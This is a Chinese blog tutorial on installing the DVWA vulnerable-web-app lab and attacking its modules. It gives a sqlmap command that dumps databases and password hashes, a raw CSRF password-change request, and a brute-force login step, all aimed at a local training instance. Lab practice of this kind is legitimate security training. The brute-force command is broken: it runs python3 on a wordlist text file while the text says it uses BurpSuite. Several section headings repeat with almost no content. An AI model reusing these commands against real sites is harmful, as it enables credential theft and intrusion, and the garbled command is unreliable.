DVWA通關教程:從安裝到破解

一、DVWA安裝教程

1、首先下載DVWA壓縮包,解壓到Web伺服器的www目錄下;

cd /var/www/
wget https://github.com/ethicalhack3r/DVWA/archive/master.zip
unzip master.zip
mv DVWA-master dvwa
cd dvwa
cp config/config.inc.php.dist config/config.inc.php

2、修改配置文件中的相關設置;

vim config/config.inc.php

3、在瀏覽器中訪問localhost/dvwa/setup.php,進行DVWA的設置

二、DVWA通關

1、注入攻擊:打開DVWA的SQL Injection模塊,使用工具進行注入攻擊,獲得管理員許可權。

sqlmap -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -p id --level=5 --risk=3 --dbms=mysql --os=linux --current-db --current-user --passwords --dump

2、XSS攻擊:打開DVWA的XSS Reflected模塊,嘗試在輸入框輸入JavaScript代碼,以達到攻擊效果。

3、CSRF攻擊:使用BurpSuite進行攻擊,構造Post請求,模擬受害者在攻擊網站中執行此請求,達到攻擊效果。

POST /dvwa/vulnerabilities/csrf/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/dvwa/vulnerabilities/csrf/

security=low&form=submit&password_new=test&password_conf=test

三、DVWA全級別教程

1、低安全性:完成注入攻擊,獲取管理員許可權。

2、中等安全性:嘗試注入攻擊失敗,需要使用布爾盲注等更高級的攻擊方式。

3、高安全性:禁用一些常用的攻擊方式,需要使用更加高級的攻擊方式在系統中進行攻擊。

四、DVWA搭建教程

在本地或者雲伺服器上安裝Web伺服器,按照上述方法安裝DVWA,即可進行DVWA靶場的搭建。

五、DVWA靶場過關教程

根據DVWA的說明文檔,逐個完成相關模塊的攻擊過關。

六、DVWA教程

通過DVWA,了解如何攻擊和防禦Web系統常見的漏洞,提升攻防水平。

七、DVWA暴力破解教程

使用工具進行暴力破解,例如使用BurpSuite,構造額外有指定字典和延遲時間的暴力破解請求:

python3 /root/tools/Seclists/Passwords/darkweb2017-top10000.txt /root/tools/Seclists/Passwords/darkweb2017-top10000.txt 4 'http://localhost:80/dvwa/vulnerabilities/brute/?username=admin&password=FUZZ&Login=Login&user_token=717bfe2f186df7252886661a62ab8cc2' brute-force

原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-tw/n/295577.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
小藍的頭像小藍
上一篇 2024-12-27 12:56
下一篇 2024-12-27 12:56

相關推薦

  • MQTT使用教程

    MQTT是一種輕量級的消息傳輸協議,適用於物聯網領域中的設備與雲端、設備與設備之間的數據傳輸。本文將介紹使用MQTT實現設備與雲端數據傳輸的方法和注意事項。 一、準備工作 在使用M…

    編程 2025-04-29
  • Python3.6.5下載安裝教程

    Python是一種面向對象、解釋型計算機程序語言。它是一門動態語言,因為它不會對程序員提前聲明變數類型,而是在變數第一次賦值時自動識別該變數的類型。 Python3.6.5是Pyt…

    編程 2025-04-29
  • Deepin系統分區設置教程

    本教程將會詳細介紹Deepin系統如何進行分區設置,分享多種方式讓您了解如何規劃您的硬碟。 一、分區的基本知識 在進行Deepin系統分區設置之前,我們需要了解一些基本分區概念。 …

    編程 2025-04-29
  • 寫代碼新手教程

    本文將從語言選擇、學習方法、編碼規範以及常見問題解答等多個方面,為編程新手提供實用、簡明的教程。 一、語言選擇 作為編程新手,選擇一門編程語言是很關鍵的一步。以下是幾個有代表性的編…

    編程 2025-04-29
  • Qt雷達探測教程

    本文主要介紹如何使用Qt開發雷達探測程序,並展示一個簡單的雷達探測示例。 一、環境準備 在開始本教程之前,需要確保你的開發環境已經安裝Qt和Qt Creator。如果沒有安裝,可以…

    編程 2025-04-29
  • 猿編程python免費全套教程400集

    想要學習Python編程嗎?猿編程python免費全套教程400集是一個不錯的選擇!下面我們來詳細了解一下這個教程。 一、課程內容 猿編程python免費全套教程400集包含了從P…

    編程 2025-04-29
  • Python煙花教程

    Python煙花代碼在近年來越來越受到人們的歡迎,因為它可以讓我們在終端里玩煙花,不僅具有視覺美感,還可以通過代碼實現動畫和音效。本教程將詳細介紹Python煙花代碼的實現原理和模…

    編程 2025-04-29
  • 使用Snare服務收集日誌:完整教程

    本教程將介紹如何使用Snare服務收集Windows伺服器上的日誌,並將其發送到遠程伺服器進行集中管理。 一、安裝和配置Snare 1、下載Snare安裝程序並安裝。 https:…

    編程 2025-04-29
  • Python畫K線教程

    本教程將從以下幾個方面詳細介紹Python畫K線的方法及技巧,包括數據處理、圖表繪製、基本設置等等。 一、數據處理 1、獲取數據 在Python中可以使用Pandas庫獲取K線數據…

    編程 2025-04-28
  • Python語言程序設計教程PDF趙璐百度網盤介紹

    Python語言程序設計教程PDF趙璐百度網盤是一本介紹Python語言編程的入門教材,本文將從以下幾個方面對其進行詳細闡述。 一、Python語言的特點 Python語言屬於解釋…

    編程 2025-04-28

發表回復

登錄後才能評論